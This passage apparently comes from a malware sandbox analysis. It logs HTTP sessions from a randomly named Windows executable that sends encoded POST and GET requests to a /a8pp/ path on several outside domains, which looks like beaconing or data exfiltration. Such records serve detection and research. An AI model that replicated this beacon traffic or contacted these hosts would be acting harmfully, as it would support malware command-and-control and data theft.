                                        Data Ascii: 2NlhHLS8=DKy/imlKCQqW6gKf6vabUZYQ0cJ4UQ9q2agl774rWWlQ/CPeWURQWlCLKquNDQ7sO+X2jESN01VtrEK0tyiPhOq1fHzZGsdaph8IiKnCrSWUZ9FpvKKcB67zvAGg606Wrl3I1vTa/5jtC2BMFlnOHEJXmx9MuFKStw5QMeatzvCYxfDfHps+5hz+Fh3wxC8XeSX+ii/XIHfQB62K6Orlbr4=
                                        Jun 4, 2024 14:37:55.445801020 CEST1176INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:37:55 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip
                                        Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 [TRUNCATED]
                                        Data Ascii: 3aeuT[oG~t{zmTBRSj8ZH(4A%j.hCF2TCZaw}X#,Pg+ hT&1DluG{=i8d}o9o W+u6m+rc}ebHeo,M {QhQ{<L"%cWXNBCm+`Txf`4 1\x*u^%qXK0d^0/V@"OuHa`:&L(LEzdDOZ}TCqB#sfd?85D*dP+U#XUnMOO]@kUN}x7"[=rWcse2}G."t-|25e]impb[r#f rGNqg05K1z}X"qphef7Gt^NW?Oz;{}:?Gk+F.v?NT]jtEv~ntr5HVFTkGoa};7}xG/7`=H[TV2!91Qw3nOM9SpI7b$?=6]_9Snvom?s:ZM+R*+?6gc&MW#Bk(A@8g) ^/\>U#W5CoUrBb>diNp}mmp=&xB:60


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        51192.168.11.3049845192.207.62.21807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:37:57.981617928 CEST1667OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 44 4b 79 2f 69 6d 6c 4b 43 51 71 57 36 67 4b 66 36 76 61 62 55 5a 59 51 30 63 4a 34 55 51 39 71 32 61 67 6c 37 37 34 72 57 58 64 51 2f 30 37 65 56 31 52 51 58 6c 43 4c 55 61 75 32 44 51 36 77 4f 2b 50 79 6a 45 65 7a 30 7a 5a 74 36 54 4b 30 6c 68 36 50 36 65 71 31 48 33 7a 59 5a 38 63 43 70 68 4d 55 69 4b 58 43 72 53 57 55 5a 38 31 70 71 72 4b 63 4d 61 37 77 6e 67 47 57 2b 30 36 79 72 6a 65 2f 31 76 57 74 2b 4a 44 74 44 57 52 4d 45 54 4c 4f 50 45 4a 56 6e 78 38 4a 75 46 47 33 74 77 6b 68 4d 65 48 4b 7a 6f 32 59 77 62 4f 5a 51 64 77 35 37 44 72 49 46 41 6e 4d 6c 30 6f 42 55 67 75 62 6e 79 6e 6f 43 33 66 61 4f 74 6d 48 6f 4f 58 38 48 37 54 36 4d 6d 2b 35 43 53 35 6b 62 7a 4a 30 46 6e 36 6c 4a 30 6c 37 46 41 57 39 2b 7a 52 74 38 64 79 61 37 59 55 71 4f 68 67 4b 79 4c 66 5a 55 38 65 72 35 36 59 46 72 55 56 51 49 4e 52 72 58 30 51 37 5a 53 6b 7a 31 67 53 42 4a 51 67 56 32 52 55 61 50 72 6e 76 4c 67 55 4a 36 6c 79 57 71 45 30 33 44 6c 76 48 71 74 6d 72 66 2b 49 4b 47 55 46 61 32 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=DKy/imlKCQqW6gKf6vabUZYQ0cJ4UQ9q2agl774rWXdQ/07eV1RQXlCLUau2DQ6wO+PyjEez0zZt6TK0lh6P6eq1H3zYZ8cCphMUiKXCrSWUZ81pqrKcMa7wngGW+06yrje/1vWt+JDtDWRMETLOPEJVnx8JuFG3twkhMeHKzo2YwbOZQdw57DrIFAnMl0oBUgubnynoC3faOtmHoOX8H7T6Mm+5CS5kbzJ0Fn6lJ0l7FAW9+zRt8dya7YUqOhgKyLfZU8er56YFrUVQINRrX0Q7ZSkz1gSBJQgV2RUaPrnvLgUJ6lyWqE03DlvHqtmrf+IKGUFa24usjKqqgJ1x32izMKWVyHuba1XrY63vt0bXh5dCuKVJ6FKY6GL6xJiNQnaJq04bgf+iE+DnFEqAhQVWLmqle87hDyuC9qpsXEfBm2x117ElwviC7QE/hYV5gI1PYlyJAkm2X07xlvZJDNMgGxDVcMYyvVwPTLVBe2MMAFGkM6JopY9PbzvFXcQN8c2Q0PiGGCJCz8nNMsudiWOFnmWEcJjxKAO/RG1am+j752HSnAhvWAduDyItHGz8ZVgLpFyHwD5gZB/mXqp3zeZkdt+1v6pQjpN37WGjvm6Yds/qoDhhR5gAUb5IfAPRBo/x6DDmBNEOa9Bj2ER/ftAH9+1lQn28Q9Db+d90sHo/WhfetNNOnz7prWUAFJOACj7UVVWj744fHm/V+bo9SWHHGu+eWmeyuloff6l9mZRwbWVnCkluR3jd1d4Zx7xyghbDanMfeUWVSlUWH2WWRfDSWMcY4cnvw6gzy/P6NbeGlkMdZt4VFAQEpPD/f92G0EOnuqKSk1eu42IY8mHU4YRmLjYfpZ209n7cD+/0yEYTI67HXhumSOfTxdep08cK/YDJ8WtfqAVN4o8uRINgo45Ig7iXDuIrCXrLbEesN3r4MRELgtBxMN5QvGY07YyYsQXMe93U7+gPbjhQQcL/JEjaLoiULC7oG9uwnHvHeq/ [TRUNCATED]
                                        Jun 4, 2024 14:37:58.159210920 CEST1176INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:37:58 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip
                                        Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 [TRUNCATED]
                                        Data Ascii: 3aeuT[oG~t{zmTBRSj8ZH(4A%j.hCF2TCZaw}X#,Pg+ hT&1DluG{=i8d}o9o W+u6m+rc}ebHeo,M {QhQ{<L"%cWXNBCm+`Txf`4 1\x*u^%qXK0d^0/V@"OuHa`:&L(LEzdDOZ}TCqB#sfd?85D*dP+U#XUnMOO]@kUN}x7"[=rWcse2}G."t-|25e]impb[r#f rGNqg05K1z}X"qphef7Gt^NW?Oz;{}:?Gk+F.v?NT]jtEv~ntr5HVFTkGoa};7}xG/7`=H[TV2!91Qw3nOM9SpI7b$?=6]_9Snvom?s:ZM+R*+?6gc&MW#Bk(A@8g) ^/\>U#W5CoUrBb>diNp}mmp=&xB:60


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        52192.168.11.3049846192.207.62.21807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:00.679064989 CEST465OUTGET /a8pp/?2NlhHLS8=OIafhQlqd3+U0X685uCjXpA/yYYLTXRf5vcl7I4tT0pe2zvQLHkCRhCjRsaaEiaqAczN9yym/x5p7g+8tSCureiRSn+8K4wSoicHodjwuTrKVPMbvJXSPao=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:00.849019051 CEST1289INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:00 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Data Raw: 35 66 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c [TRUNCATED]
                                        Data Ascii: 5fb<!doctype html><html><head><meta charset="utf-8"><title></title><style>*{margin:0;padding:0;color:#444}body{font-size:14px;font-family:""}.main{width:600px;margin:10% auto;}.title{background: #20a53a;color: #fff;font-size: 16px;height: 40px;line-height: 40px;padding-left: 20px;}.content{background-color:#f3f7f9; height:280px;border:1px dashed #c6d9b6;padding:20px}.t1{border-bottom: 1px dashed #c6d9b6;color: #ff4000;font-weight: bold; margin: 0 0 20px; padding-bottom: 18px;}.t2{margin-bottom:8px; font-weight:bold}ol{margin:0 0 20px 22px;padding:0;}ol li{line-height:30px}</style></head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KPvSogiWixBEEhWI",ck:"KPvSogiWixBEEhWI"})</script><body><div class="main"><div class="title"></div><div class="content"><p class="t1"></p><p class="t2"> [TRUNCATED]
                                        Jun 4, 2024 14:38:00.849031925 CEST447INData Raw: 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 32 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 ef bc 9a 3c 2f 70 3e 0a 09 09 09 3c 6f 6c 3e 0a 09 09 09 09 3c 6c 69 3e e6 a3 80 e6 9f a5 e6 8f 90 e4 ba a4 e5 86 85 e5 ae b9 ef bc 9b 3c 2f 6c 69 3e 0a
                                        Data Ascii: ><p class="t2"></p><ol><li></li><li></li><li></li></ol></div></div></body><scrip
                                        Jun 4, 2024 14:38:00.849209070 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        53192.168.11.304984791.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:09.145692110 CEST466OUTGET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.peptily.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:09.372328997 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        54192.168.11.304984834.120.137.41807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:14.501797915 CEST757OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6d 32 31 49 44 42 52 54 43 38 61 48 55 37 44 4b 78 62 73 55 37 38 73 55 67 66 2b 72 42 64 65 52 53 6d 52 37 62 41 64 39 49 46 47 48 68 70 42 49 61 7a 43 53 50 42 41 4e 54 2f 45 4d 71 4f 77 2f 4a 44 2f 4f 6d 32 65 56 50 30 2b 74 71 63 67 43 62 4e 61 7a 6a 33 50 4c 47 66 63 35 34 35 67 4e 38 2b 57 5a 55 77 58 56 68 69 78 38 4a 7a 35 7a 33 36 66 43 52 31 32 43 5a 62 67 37 42 53 33 37 72 62 69 49 41 31 48 4f 67 6b 65 36 2b 2b 67 78 59 4a 5a 4b 32 74 4a 50 5a 72 43 4b 71 6f 56 52 61 4d 4f 6b 64 51 52 33 6a 53 39 4a 4b 72 59 65 79 62 6d 49 44 6e 31 34 65 65 30 4f 55 6d 50 34 48 67 3d 3d
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHU7DKxbsU78sUgf+rBdeRSmR7bAd9IFGHhpBIazCSPBANT/EMqOw/JD/Om2eVP0+tqcgCbNazj3PLGfc545gN8+WZUwXVhix8Jz5z36fCR12CZbg7BS37rbiIA1HOgke6++gxYJZK2tJPZrCKqoVRaMOkdQR3jS9JKrYeybmIDn14ee0OUmP4Hg==
                                        Jun 4, 2024 14:38:14.649626017 CEST462INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:38:14 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge3
                                        Via: 1.1 google
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        55192.168.11.304984934.120.137.41807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:17.141961098 CEST777OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6d 32 31 49 44 42 52 54 43 38 61 48 56 66 2f 4b 30 37 51 55 73 73 73 4c 6c 66 2b 72 50 39 65 56 53 68 5a 37 62 42 59 32 49 77 32 48 6d 4c 70 49 5a 79 43 53 4b 42 41 4e 62 66 45 4a 33 65 77 30 4a 43 43 37 6d 33 79 56 50 30 36 74 71 5a 45 43 62 36 32 79 69 6e 50 4e 4f 2f 63 37 32 5a 67 4e 38 2b 57 5a 55 77 44 37 68 69 35 38 4a 43 4a 7a 32 66 2f 4e 53 31 32 42 61 62 67 37 54 69 33 33 72 62 69 75 41 78 47 62 67 6d 57 36 2b 2f 51 78 62 59 5a 46 6c 4e 4a 4a 55 4c 43 5a 36 35 6b 63 64 64 4b 50 57 67 39 45 70 78 5a 67 43 63 70 45 76 59 53 4b 51 48 4a 56 43 66 5a 6d 57 6b 4f 6a 61 71 4b 4c 6e 58 58 65 4a 78 78 49 56 44 62 69 37 31 61 30 37 57 41 3d
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHVf/K07QUsssLlf+rP9eVShZ7bBY2Iw2HmLpIZyCSKBANbfEJ3ew0JCC7m3yVP06tqZECb62yinPNO/c72ZgN8+WZUwD7hi58JCJz2f/NS12Babg7Ti33rbiuAxGbgmW6+/QxbYZFlNJJULCZ65kcddKPWg9EpxZgCcpEvYSKQHJVCfZmWkOjaqKLnXXeJxxIVDbi71a07WA=
                                        Jun 4, 2024 14:38:17.288959980 CEST462INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:38:17 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge2
                                        Via: 1.1 google
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        56192.168.11.304985034.120.137.41807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:19.781563997 CEST1694OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6d 32 31 49 44 42 52 54 43 38 61 48 56 66 2f 4b 30 37 51 55 73 73 73 4c 6c 66 2b 72 50 39 65 56 53 68 5a 37 62 42 59 32 49 77 2b 48 6d 34 52 49 5a 52 36 53 4e 42 41 4e 61 66 45 49 33 65 77 6c 4a 43 61 33 6d 33 75 76 50 33 53 74 34 72 4d 43 64 49 4f 79 74 6e 50 4e 43 66 63 36 34 35 68 46 38 2b 47 47 55 77 54 37 68 69 35 38 4a 42 52 7a 78 4b 66 4e 65 56 32 43 5a 62 67 33 42 53 32 69 72 62 36 51 41 78 4c 67 6e 53 61 36 2b 66 41 78 4c 36 42 46 2f 4e 4a 4c 58 4c 44 45 36 35 70 63 64 64 47 44 57 67 59 70 70 77 74 67 42 34 6b 75 72 5a 57 57 43 6d 6c 58 4c 66 49 63 59 6c 32 58 51 4c 2b 71 6e 47 76 62 66 7a 5a 6b 57 6b 37 6b 67 32 53 33 74 47 72 46 56 78 58 35 65 56 6d 39 42 43 39 4a 36 36 37 66 7a 6c 4f 43 78 69 70 64 38 59 78 68 44 42 4d 79 71 48 41 77 5a 59 57 47 64 43 51 36 54 61 55 49 4d 35 57 45 34 64 61 77 2b 32 32 67 31 69 68 42 52 2b 4c 53 68 53 4f 54 6a 63 2b 65 67 4a 51 44 61 54 4b 49 2b 43 37 65 61 74 6a 32 32 2b 36 49 7a 4c 36 69 33 72 57 67 79 46 4d 54 6b 47 75 48 75 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHVf/K07QUsssLlf+rP9eVShZ7bBY2Iw+Hm4RIZR6SNBANafEI3ewlJCa3m3uvP3St4rMCdIOytnPNCfc645hF8+GGUwT7hi58JBRzxKfNeV2CZbg3BS2irb6QAxLgnSa6+fAxL6BF/NJLXLDE65pcddGDWgYppwtgB4kurZWWCmlXLfIcYl2XQL+qnGvbfzZkWk7kg2S3tGrFVxX5eVm9BC9J667fzlOCxipd8YxhDBMyqHAwZYWGdCQ6TaUIM5WE4daw+22g1ihBR+LShSOTjc+egJQDaTKI+C7eatj22+6IzL6i3rWgyFMTkGuHu9Zuh8Qyp9RpKHQ7Tsg8GXdrlIjqo0rMlqD2vGaXkkQSYar8FOmVyHWE3816yVenmn1vlQGf8kPkNcT7GqWBfvb/Q9CIcfGXx/vzX3V3ce9sdoMY9eJ+0QkIKXz6ZXt51MAi/f6dKmQWjsoqxFa8x7HkCXf234r8mS1w7ccIT1547zkxWgG4nUcnYUQRCcUsl5ok2p/gFI62Zlj91jqWdJwEojljxSBMLFEDoqSQAQ9VixajbX125Ok72cHGofJ6BQMWtGVB3ai7006X/s03p5b4boE4fda8nH5/tqJhBqB9A7N/Tg963L10iFqVeHEOzKm+8UKgMJx2P6n41iEu+biNF+gA+dL1XJzQ/TNaC4kWVObE9OdER4AioJx0hZ1U3MRqlUgD1zGRHGnc7PUERrzn3LkdKe/jqtKhUjKLiqyNLSinsgimYuYeCO8RwAe3S7oZZcK0rcpCEdBDt99QgVI5ZuqRjJ0yl6VXG4LmdGDiiMmQhaeEs57VTTD4vL9naLZXIvvXX5hxiAxpxncg3r/JoFPnuolHonEYhGehhqFS0vBqhmCkrJ+Q0hyn4Mdr+N0jXXYiN8dpAriTfH3l24toCA5Rb5jbT9/7F5YgRu67kUott3Llp+mu8xC/wVS+CYrrg+vTeaWzPGhYZlku0ff8Sb+62UO57X8 [TRUNCATED]
                                        Jun 4, 2024 14:38:19.925964117 CEST462INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:38:19 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
